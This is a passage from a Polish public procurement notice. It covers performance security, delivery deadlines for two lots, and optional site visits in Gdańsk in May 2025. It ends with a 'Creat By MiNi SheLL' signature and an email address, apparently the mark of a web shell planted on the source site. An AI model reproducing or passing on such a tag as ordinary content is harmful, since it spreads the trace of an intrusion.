zobowiązany będzie do wniesienia zabezpieczenia należytego wykonania umowy, dalej zwanego zabezpieczeniem, w wysokości 5% ceny całkowitej podanej w ofercie w zakresie części nr 1 (ceny brutto). Szczegółowe informacje dot. należytego zabezpieczenia wykonania umowy zostały zawarte w Rozdziale XXIII SWZ oraz § 15 projektu umowy - w zakresie części nr 1 zamówienia. W zakresie części nr 2 zamówienia Zamawiający nie wymaga wniesienia zabezpieczenia należytego wykonania umowy.<br/>5. Termin wykonania zamówienia.<br/>•	Część nr 1: Zamawiający wymaga, aby zamówienie zostało wykonane w terminie 10 tygodni od daty zawarcia umowy. <br/>•	Część nr 2: Zamawiający wymaga, aby zamówienie zostało wykonane w terminie 6 tygodni od daty zawarcia umowy.<br/>6. Zamawiający przewiduje również możliwość złożenia oferty po odbyciu przez Wykonawców wizji lokalnej, która odbędzie się:<br/>•	w zakresie części nr 1, w terminie 6 maja 2025 r. o godz. 10:00, miejsce spotkania: przed wejściem głównym do budynku przy ul. Okopowej 21/27 w Gdańsku. Udział Wykonawców w wizji lokalnej nie jest obowiązkowy;<br/>•	w zakresie części nr 2, w terminie 7 maja 2025 r. o godz. 10:00, miejsce spotkania: przed wejściem głównym do budynku przy ul. Okopowej 21/27 w Gdańsku. Udział Wykonawców w wizji lokalnej nie jest obowiązkowy.

Creat By MiNi SheLL
Email: jattceo@gmail.com